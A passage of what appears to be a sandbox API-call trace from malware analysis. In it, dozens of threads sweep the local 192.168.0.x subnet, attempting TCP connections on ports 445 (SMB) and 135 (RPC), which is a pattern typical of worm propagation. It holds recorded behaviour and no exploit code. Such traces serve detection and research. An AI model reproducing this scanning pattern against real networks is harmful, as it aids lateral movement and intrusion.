10035 [0095.987] select (in: nfds=0, readfds=0x0, writefds=0x4fafd08, exceptfds=0x4fafe10, timeout=0x4faff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4fafd08, exceptfds=0x4fafe10) returned 0 [0101.033] closesocket (s=0x864) returned 0 [0101.033] RtlExitUserThread (Status=0x0) Thread: id = 73 os_tid = 0x82c [0090.862] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1c48 [0090.862] free (_Block=0x1fb1c48) [0090.862] inet_addr (cp="192.168.0.240") returned 0xf000a8c0 [0090.862] htons (hostshort=0x1bd) returned 0xbd01 [0090.862] socket (af=2, type=1, protocol=6) returned 0x870 [0090.980] ioctlsocket (in: s=0x870, cmd=-2147195266, argp=0x50eff34 | out: argp=0x50eff34) returned 0 [0090.980] connect (s=0x870, name=0x50eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.240"), namelen=16) returned -1 [0090.981] WSAGetLastError () returned 10035 [0090.981] select (in: nfds=0, readfds=0x0, writefds=0x50efd08, exceptfds=0x50efe10, timeout=0x50eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x50efd08, exceptfds=0x50efe10) returned 0 [0095.983] closesocket (s=0x870) returned 0 [0095.984] inet_addr (cp="192.168.0.240") returned 0xf000a8c0 [0095.984] htons (hostshort=0x87) returned 0x8700 [0095.984] socket (af=2, type=1, protocol=6) returned 0x870 [0095.984] ioctlsocket (in: s=0x870, cmd=-2147195266, argp=0x50eff34 | out: argp=0x50eff34) returned 0 [0095.984] connect (s=0x870, name=0x50eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.240"), namelen=16) returned -1 [0095.984] WSAGetLastError () returned 10035 [0095.984] select (in: nfds=0, readfds=0x0, writefds=0x50efd08, exceptfds=0x50efe10, timeout=0x50eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x50efd08, exceptfds=0x50efe10) returned 0 [0101.030] closesocket (s=0x870) returned 0 [0101.030] RtlExitUserThread (Status=0x0) Thread: id = 74 os_tid = 0x868 [0090.862] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1c20 [0090.862] free (_Block=0x1fb1c20) [0090.862] inet_addr (cp="192.168.0.239") returned 0xef00a8c0 [0090.862] htons (hostshort=0x1bd) returned 0xbd01 [0090.862] socket (af=2, type=1, protocol=6) returned 0x878 [0090.981] ioctlsocket (in: s=0x878, cmd=-2147195266, argp=0x522ff34 | out: argp=0x522ff34) returned 0 [0090.981] connect (s=0x878, name=0x522ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.239"), namelen=16) returned -1 [0090.982] WSAGetLastError () returned 10035 [0090.982] select (in: nfds=0, readfds=0x0, writefds=0x522fd08, exceptfds=0x522fe10, timeout=0x522ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x522fd08, exceptfds=0x522fe10) returned 0 [0095.982] closesocket (s=0x878) returned 0 [0095.982] inet_addr (cp="192.168.0.239") returned 0xef00a8c0 [0095.982] htons (hostshort=0x87) returned 0x8700 [0095.982] socket (af=2, type=1, protocol=6) returned 0x878 [0095.983] ioctlsocket (in: s=0x878, cmd=-2147195266, argp=0x522ff34 | out: argp=0x522ff34) returned 0 [0095.983] connect (s=0x878, name=0x522ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.239"), namelen=16) returned -1 [0095.983] WSAGetLastError () returned 10035 [0095.983] select (in: nfds=0, readfds=0x0, writefds=0x522fd08, exceptfds=0x522fe10, timeout=0x522ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x522fd08, exceptfds=0x522fe10) returned 0 [0101.028] closesocket (s=0x878) returned 0 [0101.029] RtlExitUserThread (Status=0x0) Thread: id = 75 os_tid = 0x880 [0090.862] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1bf8 [0090.863] free (_Block=0x1fb1bf8) [0090.863] inet_addr (cp="192.168.0.238") returned 0xee00a8c0 [0090.863] htons (hostshort=0x1bd) returned 0xbd01 [0090.863] socket (af=2, type=1, protocol=6) returned 0x880 [0090.982] ioctlsocket (in: s=0x880, cmd=-2147195266, argp=0x536ff34 | out: argp=0x536ff34) returned 0 [0090.982] connect (s=0x880, name=0x536ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.238"), namelen=16) returned -1 [0090.983] WSAGetLastError () returned 10035 [0090.983] select (in: nfds=0, readfds=0x0, writefds=0x536fd08, exceptfds=0x536fe10, timeout=0x536ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x536fd08, exceptfds=0x536fe10) returned 0 [0095.977] closesocket (s=0x880) returned 0 [0095.978] inet_addr (cp="192.168.0.238") returned 0xee00a8c0 [0095.978] htons (hostshort=0x87) returned 0x8700 [0095.978] socket (af=2, type=1, protocol=6) returned 0x880 [0095.981] ioctlsocket (in: s=0x880, cmd=-2147195266, argp=0x536ff34 | out: argp=0x536ff34) returned 0 [0095.981] connect (s=0x880, name=0x536ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.238"), namelen=16) returned -1 [0095.981] WSAGetLastError () returned 10035 [0095.981] select (in: nfds=0, readfds=0x0, writefds=0x536fd08, exceptfds=0x536fe10, timeout=0x536ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x536fd08, exceptfds=0x536fe10) returned 0 [0101.027] closesocket (s=0x880) returned 0 [0101.027] RtlExitUserThread (Status=0x0) Thread: id = 76 os_tid = 0x87c [0090.863] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1bd0 [0090.863] free (_Block=0x1fb1bd0) [0090.863] inet_addr (cp="192.168.0.237") returned 0xed00a8c0 [0090.863] htons (hostshort=0x1bd) returned 0xbd01 [0090.863] socket (af=2, type=1, protocol=6) returned 0x888 [0090.983] ioctlsocket (in: s=0x888, cmd=-2147195266, argp=0x54aff34 | out: argp=0x54aff34) returned 0 [0090.983] connect (s=0x888, name=0x54aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.237"), namelen=16) returned -1 [0090.986] WSAGetLastError () returned 10035 [0090.986] select (in: nfds=0, readfds=0x0, writefds=0x54afd08, exceptfds=0x54afe10, timeout=0x54aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x54afd08, exceptfds=0x54afe10) returned 0 [0096.014] closesocket (s=0x888) returned 0 [0096.014] inet_addr (cp="192.168.0.237") returned 0xed00a8c0 [0096.014] htons (hostshort=0x87) returned 0x8700 [0096.014] socket (af=2, type=1, protocol=6) returned 0x888 [0096.015] ioctlsocket (in: s=0x888, cmd=-2147195266, argp=0x54aff34 | out: argp=0x54aff34) returned 0 [0096.015] connect (s=0x888, name=0x54aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.237"), namelen=16) returned -1 [0096.015] WSAGetLastError () returned 10035 [0096.015] select (in: nfds=0, readfds=0x0, writefds=0x54afd08, exceptfds=0x54afe10, timeout=0x54aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x54afd08, exceptfds=0x54afe10) returned 0 [0101.077] closesocket (s=0x888) returned 0 [0101.078] RtlExitUserThread (Status=0x0) Thread: id = 77 os_tid = 0xb00 [0090.863] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1ba8 [0090.863] free (_Block=0x1fb1ba8) [0090.863] inet_addr (cp="192.168.0.236") returned 0xec00a8c0 [0090.863] htons (hostshort=0x1bd) returned 0xbd01 [0090.864] socket (af=2, type=1, protocol=6) returned 0x890 [0090.986] ioctlsocket (in: s=0x890, cmd=-2147195266, argp=0x55eff34 | out: argp=0x55eff34) returned 0 [0090.986] connect (s=0x890, name=0x55eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.236"), namelen=16) returned -1 [0090.988] WSAGetLastError () returned 10035 [0090.988] select (in: nfds=0, readfds=0x0, writefds=0x55efd08, exceptfds=0x55efe10, timeout=0x55eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x55efd08, exceptfds=0x55efe10) returned 0 [0096.013] closesocket (s=0x890) returned 0 [0096.013] inet_addr (cp="192.168.0.236") returned 0xec00a8c0 [0096.013] htons (hostshort=0x87) returned 0x8700 [0096.013] socket (af=2, type=1, protocol=6) returned 0x890 [0096.013] ioctlsocket (in: s=0x890, cmd=-2147195266, argp=0x55eff34 | out: argp=0x55eff34) returned 0 [0096.013] connect (s=0x890, name=0x55eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.236"), namelen=16) returned -1 [0096.014] WSAGetLastError () returned 10035 [0096.014] select (in: nfds=0, readfds=0x0, writefds=0x55efd08, exceptfds=0x55efe10, timeout=0x55eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x55efd08, exceptfds=0x55efe10) returned 0 [0101.079] closesocket (s=0x890) returned 0 [0101.080] RtlExitUserThread (Status=0x0) Thread: id = 78 os_tid = 0xb0c [0090.864] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1b80 [0090.864] free (_Block=0x1fb1b80) [0090.864] inet_addr (cp="192.168.0.235") returned 0xeb00a8c0 [0090.864] htons (hostshort=0x1bd) returned 0xbd01 [0090.864] socket (af=2, type=1, protocol=6) returned 0x898 [0090.990] ioctlsocket (in: s=0x898, cmd=-2147195266, argp=0x572ff34 | out: argp=0x572ff34) returned 0 [0090.990] connect (s=0x898, name=0x572ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.235"), namelen=16) returned -1 [0090.990] WSAGetLastError () returned 10035 [0090.991] select (in: nfds=0, readfds=0x0, writefds=0x572fd08, exceptfds=0x572fe10, timeout=0x572ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x572fd08, exceptfds=0x572fe10) returned 0 [0096.011] closesocket (s=0x898) returned 0 [0096.012] inet_addr (cp="192.168.0.235") returned 0xeb00a8c0 [0096.012] htons (hostshort=0x87) returned 0x8700 [0096.012] socket (af=2, type=1, protocol=6) returned 0x898 [0096.012] ioctlsocket (in: s=0x898, cmd=-2147195266, argp=0x572ff34 | out: argp=0x572ff34) returned 0 [0096.012] connect (s=0x898, name=0x572ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.235"), namelen=16) returned -1 [0096.012] WSAGetLastError () returned 10035 [0096.012] select (in: nfds=0, readfds=0x0, writefds=0x572fd08, exceptfds=0x572fe10, timeout=0x572ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x572fd08, exceptfds=0x572fe10) returned 0 [0101.081] closesocket (s=0x898) returned 0 [0101.081] RtlExitUserThread (Status=0x0) Thread: id = 79 os_tid = 0xb58 [0090.864] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1b58 [0090.864] free (_Block=0x1fb1b58) [0090.864] inet_addr (cp="192.168.0.234") returned 0xea00a8c0 [0090.864] htons (hostshort=0x1bd) returned 0xbd01 [0090.864] socket (af=2, type=1, protocol=6) returned 0x8a0 [0090.991] ioctlsocket (in: s=0x8a0, cmd=-2147195266, argp=0x586ff34 | out: argp=0x586ff34) returned 0 [0090.991] connect (s=0x8a0, name=0x586ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.234"), namelen=16) returned -1 [0090.992] WSAGetLastError () returned 10035 [0090.992] select (in: nfds=0, readfds=0x0, writefds=0x586fd08, exceptfds=0x586fe10, timeout=0x586ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x586fd08, exceptfds=0x586fe10) returned 0 [0096.010] closesocket (s=0x8a0) returned 0 [0096.010] inet_addr (cp="192.168.0.234") returned 0xea00a8c0 [0096.010] htons (hostshort=0x87) returned 0x8700 [0096.011] socket (af=2, type=1, protocol=6) returned 0x8a0 [0096.011] ioctlsocket (in: s=0x8a0, cmd=-2147195266, argp=0x586ff34 | out: argp=0x586ff34) returned 0 [0096.011] connect (s=0x8a0, name=0x586ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.234"), namelen=16) returned -1 [0096.011] WSAGetLastError () returned 10035 [0096.011] select (in: nfds=0, readfds=0x0, writefds=0x586fd08, exceptfds=0x586fe10, timeout=0x586ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x586fd08, exceptfds=0x586fe10) returned 0 [0101.082] closesocket (s=0x8a0) returned 0 [0101.083] RtlExitUserThread (Status=0x0) Thread: id = 80 os_tid = 0xb6c [0090.865] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1b30 [0090.865] free (_Block=0x1fb1b30) [0090.865] inet_addr (cp="192.168.0.233") returned 0xe900a8c0 [0090.865] htons (hostshort=0x1bd) returned 0xbd01 [0090.865] socket (af=2, type=1, protocol=6) returned 0x8a8 [0090.992] ioctlsocket (in: s=0x8a8, cmd=-2147195266, argp=0x59aff34 | out: argp=0x59aff34) returned 0 [0090.992] connect (s=0x8a8, name=0x59aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.233"), namelen=16) returned -1 [0090.993] WSAGetLastError () returned 10035 [0090.993] select (in: nfds=0, readfds=0x0, writefds=0x59afd08, exceptfds=0x59afe10, timeout=0x59aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x59afd08, exceptfds=0x59afe10) returned 0 [0096.009] closesocket (s=0x8a8) returned 0 [0096.009] inet_addr (cp="192.168.0.233") returned 0xe900a8c0 [0096.009] htons (hostshort=0x87) returned 0x8700 [0096.009] socket (af=2, type=1, protocol=6) returned 0x8a8 [0096.009] ioctlsocket (in: s=0x8a8, cmd=-2147195266, argp=0x59aff34 | out: argp=0x59aff34) returned 0 [0096.009] connect (s=0x8a8, name=0x59aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.233"), namelen=16) returned -1 [0096.010] WSAGetLastError () returned 10035 [0096.010] select (in: nfds=0, readfds=0x0, writefds=0x59afd08, exceptfds=0x59afe10, timeout=0x59aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x59afd08, exceptfds=0x59afe10) returned 0 [0101.084] closesocket (s=0x8a8) returned 0 [0101.085] RtlExitUserThread (Status=0x0) Thread: id = 81 os_tid = 0xb4c [0090.865] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1b08 [0090.865] free (_Block=0x1fb1b08) [0090.865] inet_addr (cp="192.168.0.232") returned 0xe800a8c0 [0090.865] htons (hostshort=0x1bd) returned 0xbd01 [0090.865] socket (af=2, type=1, protocol=6) returned 0x8b0 [0090.993] ioctlsocket (in: s=0x8b0, cmd=-2147195266, argp=0x5aeff34 | out: argp=0x5aeff34) returned 0 [0090.993] connect (s=0x8b0, name=0x5aeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.232"), namelen=16) returned -1 [0090.994] WSAGetLastError () returned 10035 [0090.994] select (in: nfds=0, readfds=0x0, writefds=0x5aefd08, exceptfds=0x5aefe10, timeout=0x5aeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5aefd08, exceptfds=0x5aefe10) returned 0 [0096.007] closesocket (s=0x8b0) returned 0 [0096.008] inet_addr (cp="192.168.0.232") returned 0xe800a8c0 [0096.008] htons (hostshort=0x87) returned 0x8700 [0096.008] socket (af=2, type=1, protocol=6) returned 0x8b0 [0096.008] ioctlsocket (in: s=0x8b0, cmd=-2147195266, argp=0x5aeff34 | out: argp=0x5aeff34) returned 0 [0096.008] connect (s=0x8b0, name=0x5aeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.232"), namelen=16) returned -1 [0096.008] WSAGetLastError () returned 10035 [0096.008] select (in: nfds=0, readfds=0x0, writefds=0x5aefd08, exceptfds=0x5aefe10, timeout=0x5aeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5aefd08, exceptfds=0x5aefe10) returned 0 [0101.086] closesocket (s=0x8b0) returned 0 [0101.086] RtlExitUserThread (Status=0x0) Thread: id = 82 os_tid = 0xb74 [0090.865] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1ae0 [0090.865] free (_Block=0x1fb1ae0) [0090.866] inet_addr (cp="192.168.0.231") returned 0xe700a8c0 [0090.866] htons (hostshort=0x1bd) returned 0xbd01 [0090.866] socket (af=2, type=1, protocol=6) returned 0x8b8 [0090.994] ioctlsocket (in: s=0x8b8, cmd=-2147195266, argp=0x5c2ff34 | out: argp=0x5c2ff34) returned 0 [0090.994] connect (s=0x8b8, name=0x5c2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.231"), namelen=16) returned -1 [0090.995] WSAGetLastError () returned 10035 [0090.995] select (in: nfds=0, readfds=0x0, writefds=0x5c2fd08, exceptfds=0x5c2fe10, timeout=0x5c2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5c2fd08, exceptfds=0x5c2fe10) returned 0 [0096.006] closesocket (s=0x8b8) returned 0 [0096.007] inet_addr (cp="192.168.0.231") returned 0xe700a8c0 [0096.007] htons (hostshort=0x87) returned 0x8700 [0096.007] socket (af=2, type=1, protocol=6) returned 0x8b8 [0096.007] ioctlsocket (in: s=0x8b8, cmd=-2147195266, argp=0x5c2ff34 | out: argp=0x5c2ff34) returned 0 [0096.007] connect (s=0x8b8, name=0x5c2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.231"), namelen=16) returned -1 [0096.007] WSAGetLastError () returned 10035 [0096.007] select (in: nfds=0, readfds=0x0, writefds=0x5c2fd08, exceptfds=0x5c2fe10, timeout=0x5c2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5c2fd08, exceptfds=0x5c2fe10) returned 0 [0101.065] closesocket (s=0x8b8) returned 0 [0101.066] RtlExitUserThread (Status=0x0) Thread: id = 83 os_tid = 0xb70 [0090.866] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1ab8 [0090.866] free (_Block=0x1fb1ab8) [0090.866] inet_addr (cp="192.168.0.230") returned 0xe600a8c0 [0090.866] htons (hostshort=0x1bd) returned 0xbd01 [0090.866] socket (af=2, type=1, protocol=6) returned 0x8c0 [0090.995] ioctlsocket (in: s=0x8c0, cmd=-2147195266, argp=0x5d6ff34 | out: argp=0x5d6ff34) returned 0 [0090.995] connect (s=0x8c0, name=0x5d6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.230"), namelen=16) returned -1 [0090.996] WSAGetLastError () returned 10035 [0090.996] select (in: nfds=0, readfds=0x0, writefds=0x5d6fd08, exceptfds=0x5d6fe10, timeout=0x5d6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5d6fd08, exceptfds=0x5d6fe10) returned 0 [0096.005] closesocket (s=0x8c0) returned 0 [0096.005] inet_addr (cp="192.168.0.230") returned 0xe600a8c0 [0096.005] htons (hostshort=0x87) returned 0x8700 [0096.005] socket (af=2, type=1, protocol=6) returned 0x8c0 [0096.006] ioctlsocket (in: s=0x8c0, cmd=-2147195266, argp=0x5d6ff34 | out: argp=0x5d6ff34) returned 0 [0096.006] connect (s=0x8c0, name=0x5d6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.230"), namelen=16) returned -1 [0096.006] WSAGetLastError () returned 10035 [0096.006] select (in: nfds=0, readfds=0x0, writefds=0x5d6fd08, exceptfds=0x5d6fe10, timeout=0x5d6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5d6fd08, exceptfds=0x5d6fe10) returned 0 [0101.064] closesocket (s=0x8c0) returned 0 [0101.065] RtlExitUserThread (Status=0x0) Thread: id = 84 os_tid = 0xb5c [0090.866] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1a90 [0090.866] free (_Block=0x1fb1a90) [0090.866] inet_addr (cp="192.168.0.229") returned 0xe500a8c0 [0090.866] htons (hostshort=0x1bd) returned 0xbd01 [0090.866] socket (af=2, type=1, protocol=6) returned 0x8c8 [0090.996] ioctlsocket (in: s=0x8c8, cmd=-2147195266, argp=0x5eaff34 | out: argp=0x5eaff34) returned 0 [0090.996] connect (s=0x8c8, name=0x5eaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.229"), namelen=16) returned -1 [0090.997] WSAGetLastError () returned 10035 [0090.997] select (in: nfds=0, readfds=0x0, writefds=0x5eafd08, exceptfds=0x5eafe10, timeout=0x5eaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5eafd08, exceptfds=0x5eafe10) returned 0 [0096.004] closesocket (s=0x8c8) returned 0 [0096.004] inet_addr (cp="192.168.0.229") returned 0xe500a8c0 [0096.004] htons (hostshort=0x87) returned 0x8700 [0096.004] socket (af=2, type=1, protocol=6) returned 0x8c8 [0096.004] ioctlsocket (in: s=0x8c8, cmd=-2147195266, argp=0x5eaff34 | out: argp=0x5eaff34) returned 0 [0096.004] connect (s=0x8c8, name=0x5eaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.229"), namelen=16) returned -1 [0096.005] WSAGetLastError () returned 10035 [0096.005] select (in: nfds=0, readfds=0x0, writefds=0x5eafd08, exceptfds=0x5eafe10, timeout=0x5eaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5eafd08, exceptfds=0x5eafe10) returned 0 [0101.062] closesocket (s=0x8c8) returned 0 [0101.063] RtlExitUserThread (Status=0x0) Thread: id = 85 os_tid = 0xb04 [0090.867] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1a68 [0090.867] free (_Block=0x1fb1a68) [0090.867] inet_addr (cp="192.168.0.228") returned 0xe400a8c0 [0090.867] htons (hostshort=0x1bd) returned 0xbd01 [0090.867] socket (af=2, type=1, protocol=6) returned 0x8d0 [0090.997] ioctlsocket (in: s=0x8d0, cmd=-2147195266, argp=0x5feff34 | out: argp=0x5feff34) returned 0 [0090.997] connect (s=0x8d0, name=0x5feff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.228"), namelen=16) returned -1 [0090.998] WSAGetLastError () returned 10035 [0090.998] select (in: nfds=0, readfds=0x0, writefds=0x5fefd08, exceptfds=0x5fefe10, timeout=0x5feff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5fefd08, exceptfds=0x5fefe10) returned 0 [0096.002] closesocket (s=0x8d0) returned 0 [0096.003] inet_addr (cp="192.168.0.228") returned 0xe400a8c0 [0096.003] htons (hostshort=0x87) returned 0x8700 [0096.003] socket (af=2, type=1, protocol=6) returned 0x8d0 [0096.003] ioctlsocket (in: s=0x8d0, cmd=-2147195266, argp=0x5feff34 | out: argp=0x5feff34) returned 0 [0096.003] connect (s=0x8d0, name=0x5feff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.228"), namelen=16) returned -1 [0096.003] WSAGetLastError () returned 10035 [0096.003] select (in: nfds=0, readfds=0x0, writefds=0x5fefd08, exceptfds=0x5fefe10, timeout=0x5feff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x5fefd08, exceptfds=0x5fefe10) returned 0 [0101.061] closesocket (s=0x8d0) returned 0 [0101.062] RtlExitUserThread (Status=0x0) Thread: id = 86 os_tid = 0xb08 [0090.867] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1a40 [0090.867] free (_Block=0x1fb1a40) [0090.867] inet_addr (cp="192.168.0.227") returned 0xe300a8c0 [0090.867] htons (hostshort=0x1bd) returned 0xbd01 [0090.867] socket (af=2, type=1, protocol=6) returned 0x8d8 [0090.998] ioctlsocket (in: s=0x8d8, cmd=-2147195266, argp=0x612ff34 | out: argp=0x612ff34) returned 0 [0090.998] connect (s=0x8d8, name=0x612ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.227"), namelen=16) returned -1 [0090.999] WSAGetLastError () returned 10035 [0090.999] select (in: nfds=0, readfds=0x0, writefds=0x612fd08, exceptfds=0x612fe10, timeout=0x612ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x612fd08, exceptfds=0x612fe10) returned 0 [0096.001] closesocket (s=0x8d8) returned 0 [0096.002] inet_addr (cp="192.168.0.227") returned 0xe300a8c0 [0096.002] htons (hostshort=0x87) returned 0x8700 [0096.002] socket (af=2, type=1, protocol=6) returned 0x8d8 [0096.002] ioctlsocket (in: s=0x8d8, cmd=-2147195266, argp=0x612ff34 | out: argp=0x612ff34) returned 0 [0096.002] connect (s=0x8d8, name=0x612ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.227"), namelen=16) returned -1 [0096.002] WSAGetLastError () returned 10035 [0096.002] select (in: nfds=0, readfds=0x0, writefds=0x612fd08, exceptfds=0x612fe10, timeout=0x612ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x612fd08, exceptfds=0x612fe10) returned 0 [0101.060] closesocket (s=0x8d8) returned 0 [0101.061] RtlExitUserThread (Status=0x0) Thread: id = 87 os_tid = 0xb2c [0090.868] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1a18 [0090.868] free (_Block=0x1fb1a18) [0090.868] inet_addr (cp="192.168.0.226") returned 0xe200a8c0 [0090.868] htons (hostshort=0x1bd) returned 0xbd01 [0090.868] socket (af=2, type=1, protocol=6) returned 0x8e0 [0090.999] ioctlsocket (in: s=0x8e0, cmd=-2147195266, argp=0x626ff34 | out: argp=0x626ff34) returned 0 [0090.999] connect (s=0x8e0, name=0x626ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.226"), namelen=16) returned -1 [0090.999] WSAGetLastError () returned 10035 [0091.000] select (in: nfds=0, readfds=0x0, writefds=0x626fd08, exceptfds=0x626fe10, timeout=0x626ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x626fd08, exceptfds=0x626fe10) returned 0 [0096.000] closesocket (s=0x8e0) returned 0 [0096.000] inet_addr (cp="192.168.0.226") returned 0xe200a8c0 [0096.000] htons (hostshort=0x87) returned 0x8700 [0096.000] socket (af=2, type=1, protocol=6) returned 0x8e0 [0096.001] ioctlsocket (in: s=0x8e0, cmd=-2147195266, argp=0x626ff34 | out: argp=0x626ff34) returned 0 [0096.001] connect (s=0x8e0, name=0x626ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.226"), namelen=16) returned -1 [0096.001] WSAGetLastError () returned 10035 [0096.001] select (in: nfds=0, readfds=0x0, writefds=0x626fd08, exceptfds=0x626fe10, timeout=0x626ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x626fd08, exceptfds=0x626fe10) returned 0 [0101.059] closesocket (s=0x8e0) returned 0 [0101.059] RtlExitUserThread (Status=0x0) Thread: id = 88 os_tid = 0xb40 [0090.868] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb19f0 [0090.868] free (_Block=0x1fb19f0) [0090.868] inet_addr (cp="192.168.0.225") returned 0xe100a8c0 [0090.868] htons (hostshort=0x1bd) returned 0xbd01 [0090.868] socket (af=2, type=1, protocol=6) returned 0x8e8 [0091.000] ioctlsocket (in: s=0x8e8, cmd=-2147195266, argp=0x63aff34 | out: argp=0x63aff34) returned 0 [0091.000] connect (s=0x8e8, name=0x63aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.225"), namelen=16) returned -1 [0091.000] WSAGetLastError () returned 10035 [0091.000] select (in: nfds=0, readfds=0x0, writefds=0x63afd08, exceptfds=0x63afe10, timeout=0x63aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x63afd08, exceptfds=0x63afe10) returned 0 [0095.999] closesocket (s=0x8e8) returned 0 [0095.999] inet_addr (cp="192.168.0.225") returned 0xe100a8c0 [0095.999] htons (hostshort=0x87) returned 0x8700 [0095.999] socket (af=2, type=1, protocol=6) returned 0x8e8 [0095.999] ioctlsocket (in: s=0x8e8, cmd=-2147195266, argp=0x63aff34 | out: argp=0x63aff34) returned 0 [0095.999] connect (s=0x8e8, name=0x63aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.225"), namelen=16) returned -1 [0096.000] WSAGetLastError () returned 10035 [0096.000] select (in: nfds=0, readfds=0x0, writefds=0x63afd08, exceptfds=0x63afe10, timeout=0x63aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x63afd08, exceptfds=0x63afe10) returned 0 [0101.058] closesocket (s=0x8e8) returned 0 [0101.058] RtlExitUserThread (Status=0x0) Thread: id = 89 os_tid = 0xc0 [0090.868] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb19c8 [0090.869] free (_Block=0x1fb19c8) [0090.869] inet_addr (cp="192.168.0.224") returned 0xe000a8c0 [0090.869] htons (hostshort=0x1bd) returned 0xbd01 [0090.869] socket (af=2, type=1, protocol=6) returned 0x8f0 [0091.001] ioctlsocket (in: s=0x8f0, cmd=-2147195266, argp=0x64eff34 | out: 